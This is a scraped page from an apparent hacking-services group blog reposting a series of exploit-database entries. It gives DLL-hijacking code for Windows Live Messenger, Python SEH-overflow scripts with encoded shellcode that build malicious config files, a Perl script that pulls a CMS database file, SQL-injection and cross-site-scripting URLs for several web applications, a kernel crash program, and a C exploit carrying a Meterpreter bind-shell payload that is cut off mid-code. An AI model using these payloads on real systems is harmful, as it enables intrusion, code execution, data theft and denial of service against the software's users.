Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863216664

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
// source: https://www.securityfocus.com/bid/48055/info

Microsoft Windows Live Messenger is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file. 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1               #########################################              1
0               I'm kalashinkov3 member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#########################################################
# Title : Msn Live Messenger14.0=>Plus! DLL Hijacking Exploit (dwmapi.dll)
# Author: Kalashinkov3
# Home : 13000/ ALGERIA
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 31/05/2011
# Category  : Local Exploit
# Tested on: [Windows Xp Sp3 Fr]       
#########################################################  

# File Vulnerable: 
- msnmsgr.exe


# Vulnerable extensions:

- .plsk

" Vulnerable Dll's:

dwmapi.dll 

./

#include <windows.h>
#define DLLIMPORT _declspec (dllexport)
                                                                                                                                                                                   
DLLIMPORT void DwmDefWindowProc() { evil(); }                                                                                                                                                                               
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }                                                                                                                                                                      
DLLIMPORT void DwmEnableComposition() { evil(); }                                                                                                                                                                           
DLLIMPORT void DwmEnableMMCSS() { evil(); }                                                                                                                                                                                 
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }                                                                                                                                                                   
DLLIMPORT void DwmGetColorizationColor() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }                                                                                                                                                                    
DLLIMPORT void DwmGetWindowAttribute() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }                                                                                                                                                               
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }                                                                                                                                                                    
DLLIMPORT void DwmRegisterThumbnail() { evil(); }                                                                                                                                                                           
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmSetPresentParameters() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmSetWindowAttribute() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }                                                                                                                                                                         
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}


^_^ GOOD LUCK ALL :) 

+ Greets To==================================================================+
                                                                             + 
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 +
ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com       +
andhrahackers.com, all Algerians Hacker'S ;) & 1337day.com/team              +
                    # All My Friends #                                       +
=============================================================================+
HireHackking 
source: https://www.securityfocus.com/bid/48056/info

The 'libxml2' library is prone to multiple memory-corruption vulnerabilities, including one that can trigger a heap-based buffer-overflow error and an integer-overflow condition.



An attacker can exploit these issues by enticing an unsuspecting user into opening a specially crafted XML file that contains a malicious XPath.



A successful attack can allow attacker-supplied code to run in the context of the application using the vulnerable library or can cause a denial-of-service condition.


//@*/preceding::node()/ancestor::node()/ancestor::foo['foo']
HireHackking 
## Source: https://code.google.com/p/google-security-research/issues/detail?id=123

Platform: Windows 8.1 Update 32/64 bit (No other OS tested)

When a user logs into a computer the User Profile Service is used to create certain directories and mount the user hives (as a normal user account cannot do so). In theory the only thing which needs to be done under a privileged account (other than loading the hives) is creating the base profile directory. This should be secure because c:\users requires administrator privileges to create. The configuration of the profile location is in HKLM so that can’t be influenced. 

However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user’s token, but this changes to impersonating Local System part of the way through. Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs everytime the user logs in to their account, it isn't something that only happens during the initial provisioning of the local profile. 

Some identified issues are:

* When creating directories the service does a recursive create, so for example if creating c:\users\user it will first create c:\users then c:\users\user. Probably not exploitable because Users already exists but of course worth remembering that normal users can create directories in the c: drive root. So always a possibility being able to place a junction point at c:\users on some systems.

* The service creates the temporary folder for the user in CreateTempDirectoryForUser and gets the value from the user’s hive Environment key (TEMP and TMP). This folder is created under system privileges. All it requires is the string starts with %USERPROFILE% so you can do relative paths or just replace USERPROFILE in the environment. This probably isn't that useful on the whole as the security of the directory is inherited from the parent.

* Creation of AppData\LocalLow folder in EnsurePreCreateKnownFolders. This might be exploited to set an arbitrary directory’s integrity level to Low as it tries to set the label explicitly. But that’s probably only of interest if there’s a directory which a normal user would be able to write to but is blocked by a high/system integrity level which is unlikely. 

* Probably most serious is the handling of the %USERPROFILE\AppData\Local\Microsoft\Windows\UsrClass.dat registry hive. The profile service queries for the location of AppData\Local from the user’s registry hive then tries to create the Windows folder and UsrClass.dat file. By creating a new folder structure, changing the user's  shell folders registry key and placing a junction in the hierarchy you can get this process to open any other UsrClass.dat file on the system, assuming it isn't already loaded. 

For example you could create a directory hierarchy like:
%USERPROFILE%\AppData\NotLocal\Microsoft\Windows -> c:\users\administrator\appdata\local\Microsoft\windows

Then set HKCU\Software\Microsoft\Windows\Explorer\User Shell Folders\Local AppData to %USERPROFILE%\AppData\NotLocal.

It seems to even set the root key security when it does so, this might be useful for privilege escalation. This has a chicken-and-egg problem in that the NtLoadKey system call will create the file if it doesn't exist (it sets the FILE_OPEN_IF disposition flag), but you must be running as an administrator  otherwise the privilege check for SeRestorePrivilege will fail.

I've looked at the implementation on Windows 7 and there are a few similar issues but Windows 8.1 implementation of the services does a lot more things. At least the most serious UsrClass.dat issue exists in 7. 

Attached is a batch file PoC for Windows 8.1 Update which demonstrates the temporary folder issue. To verify perform the following steps:
1) Execute the batch file as a normal user (this was tested with a local account, not a Microsoft online linked account, or domain). This will change the environment variables TEMP and TMP to be %USERPROFILE%\..\..\..\..\Windows\faketemp
2) Logout then log back in again
3) Observe that the directory \Windows\faketemp has been created.





reg add HKCU\Environment /v TEMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp
reg add HKCU\Environment /v TMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp
HireHackking 
#!/usr/bin/python
# coding: utf-8
#Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow 
#Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06)
#Software for usb Wireless:T-Mobile web'n'walk Stick Fusion
#Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
#Software Link:https://www.t-mobile.de/downloads/neu/winui.zip
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN
#Video poc:http://bit.ly/17DhwSR
print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
from struct import pack
junk="\x41" * 18073
nseh="\xeb\x06\x90\x90" 
seh=pack('<I',0x6900CEAE)#6900CEAE 5F  POP EDI intl.dll
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
header  = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x0a"
header += "\x0a\x55\x50\x44\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x0a\x0a\x5b\x53\x65\x72\x76\x69"
header += "\x63\x65\x5d\x0a\x0a\x0a\x0a\x6d\x65\x74\x61\x63\x6f\x6d\x3d\x74\x77\x69\x74\x74\x65\x72\x2e\x63\x6f\x6d\x2f\x6d\x33\x74"
header += "\x61\x63\x30\x6d\x0a\x0a\x0a\x0a\x53\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73"
header += "\x70\x78\x0a\x0a\x0a\x0a\x55\x70\x64\x61\x74\x65\x52\x65\x70\x6f\x72\x74\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x52\x65\x73\x75\x6c\x74\x52\x65"
header += "\x70\x6f\x72\x74\x2e\x61\x73\x70\x78"+junk+nseh+seh+nops+shellcode+'\n\n'
footer  = "\x0a\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48"
footer += "\x3d\x2e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33"
footer += "\x30\x30\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54"
footer += "\x5f\x54\x49\x4d\x45\x4f\x55\x54\x3d\x32\x30\x0a\x0a\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x0a"
footer += "\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53\x79\x73\x3d\x31\x0a" 
exploit =  header + footer
filename = "UpdateCfg.ini"
file = open(filename , "w")
file.write(exploit)
file.close()
HireHackking 
#!/usr/bin/python
#Exploit Title:Congstar Internet-Manager SEH Buffer Overflow 
#Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100)
#Homepage:www.congstar.de/downloads/prepaid-internet-stick/
#Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip
#Version:14.0.0.162
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Windows 7 En
print "[*]Copy UpdateCfg.ini to C:\Program Files\congstar\Internetmanager\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen\n"
from struct import pack
buffer1 = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x55\x50\x44"
buffer1 += "\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x5b\x53\x65\x72\x76\x69\x63\x65\x5d\x0a\x0a\x53"
buffer1 += "\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e"
buffer1 += "\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73\x70\x78\x0a"
junk="\x41" * 18164
nseh="\xeb\x06\x90\x90" 
seh=pack('<I',0x7C3A1868)#7C3A1868
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
poc="\n" + "UpdateReport" + "=" + junk + nseh + seh + nops + shellcode +"\n\n"
buffer2 = "\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48\x3d\x2e"
buffer2 += "\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33\x30\x30\x0a\x0a"
buffer2 += "\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54\x5f\x54\x49\x4d\x45\x4f\x55\x54"
buffer2 += "\x3d\x32\x30\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53"
buffer2 += "\x79\x73\x3d\x31\x0a"
exploit =  buffer1 + poc + buffer2
try:
    out_file = open("UpdateCfg.ini",'w')
    out_file.write(exploit)
    out_file.close()
except:
    print "Error"
HireHackking 
source: https://www.securityfocus.com/bid/48067/info

TEDE Simplificado is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

TEDE Simplificado v1.01 and vS2.04 are vulnerable; other versions may also be affected. 

http://www.example.com/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1

http://www.example.com/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4
HireHackking 
source: https://www.securityfocus.com/bid/48068/info

PikaCMS is prone to multiple local file-disclosure vulnerabilities because it fails to adequately validate user-supplied input.

Exploiting these vulnerabilities may allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 

use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact :   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="shkarko.php?f=lidhjet/baza_mysql.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... 
 \n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}
HireHackking 
source: https://www.securityfocus.com/bid/48083/info

ARSC Really Simple Chat is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ARSC Really Simple Chat 3.3-rc2 is vulnerable; other versions may also be affected. 

SQL injection:

http://www.example.com/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
http://www.example.com/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.example.com/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202

Cross-site Scripting:

http://www.example.com/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/48085/info

NetGear WNDAP350 wireless access point is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information.

A remote attacker can exploit these issues to obtain sensitive information that can aid in launching further attacks.

WNDAP350 with firmware 2.0.1 and 2.0.9 are vulnerable; other firmware versions may also be affected. 

http://www.example.com/downloadFile.php
http://www.example.com/BackupConfig.php
HireHackking 
source: https://www.securityfocus.com/bid/48087/info

Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Nagios 3.2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>
HireHackking 
source: https://www.securityfocus.com/bid/48100/info

Ushahidi is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Ushahidi 2.0.1 is vulnerable; prior versions may also be affected. 

http://www.example.com/index.php/admin/dashboard/?range=1[SQLi]
HireHackking 
/*
source: https://www.securityfocus.com/bid/48101/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition. 
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#define BUFSIZE getpagesize()

int main(int argc, char **argv)
{
	void *ptr;
	if (posix_memalign(&ptr, getpagesize(), BUFSIZE) < 0) {
		perror("posix_memalign");
		exit(1);
	}
	if (madvise(ptr, BUFSIZE, MADV_MERGEABLE) < 0) {
		perror("madvise");
		exit(1);
	}
	*(char *)NULL = 0;
	return 0;
}
HireHackking 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 65536  

/*
 * Title: Sim Editor v6.6 Stack Based Buffer Overflow
 * Version: 6.6
 * Tested on: Windows XP sp2 en, Windows 8 64-bit
 * Date: 16-01-2015
 * Author: Osanda Malith Jayathissa
 * E-Mail: osanda[cat]unseen.is
 * Website: OsandaMalith.wordpress.com
 * CVE: CVE-2015-1171
 */

const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1" 
        		"3231561503561583eefce2a496ab54" 
        		"46672c07cf821d15abc70ca9b88abc"
        		"42ec3e36263830ff8d1e7f00209ed3"
        		"c222622e17855be16ac49c1c849475"
        		"6a3709f22e8428d424b45251fa41e9"
        		"582bf96612d3712082e25632feadd3"
        		"81752c32d8761e7ab749ae77c98e09"
        		"68bce46915c73f13c142ddb382f505"
        		"454663ce4923e7884db224a36a3fcb"
        		"63fb7be8a7a7d891fe0d8eaee0ea6f"
        		"0b6b187b2d36777abf4d3e7cbf4d11"
        		"158ec6fe620f0dbb9d450fea3500da"
        		"ae5bb331ec6530b38d9128b688deee"
        		"2be14f9b4b566f8e262bff50d1a58b"
        		"92"; 

/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
		"4a83effc315f11035f11e2ca04054e"
		"34f5d62fbd10e77dd9515ab2aa3457"
		"39feacec4fd6c345e500ed56cb8ca1"
		"954d70b8c9ad49731caf8e6eeffd47"
		"e44212ecb85e99be2ce77e744cc6d0"
		"0317c8d3c02341cc050f1b67fdfb9a"
		"a1cc04ad8d823a0100db7ba6fbae77"
		"d486a843a65c3d560016e5b2b0fb73"
		"30beb0f01ea347d514dfccd8fa6996"
		"fede324c9f479f23a098479b04d26a"
		"c831b9e23d7342f3290431c1f6bedd"
		"697e18198d55dcb570561c9fb6024c"
		"b71f2b07479ffe87170f5167c8ef01"
		"0f02e07e2f2d2a179e098670e2ad38"
		"dd6b4b50cd3dc3cd2f1adc6a4f4970"
		"22c7c69ef4e8d7b45644705f2d8645"
		"7e3283ee17a5597e55575dab0f97cb"
		"5786c06355ff272ca62a3ce532952b"
		"0ad215ac5cb815c4389845f14635fa"
		"aad2b5ab1f74dd5179b242a9ac42bf"
		"7c89c0c90af908";

const char *shells[] = { shell1, shell2 };
const char *shell_names[] = { "MS Paint", "Bind Shell" };
const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
const size_t SHELLS_COUNT = 2;

int menu() {
    size_t shell_type = SHELLS_COUNT;
    puts("\b[?] Choose an Option: ");
    size_t i;
    for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]);
    scanf("%i", &shell_type);
	return shell_type;
}

void banner() {
    static const char banner[] =                                                                                                
                " _____ _          _____   _ _ _           \n"
                "|   __|_|_____   |   __|_| |_| |_ ___ ___ \n"
                "|__   | |     |  |   __| . | |  _| . |  _|\n"
                "|_____|_|_|_|_|  |_____|___|_|_| |___|_|\n"
                "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
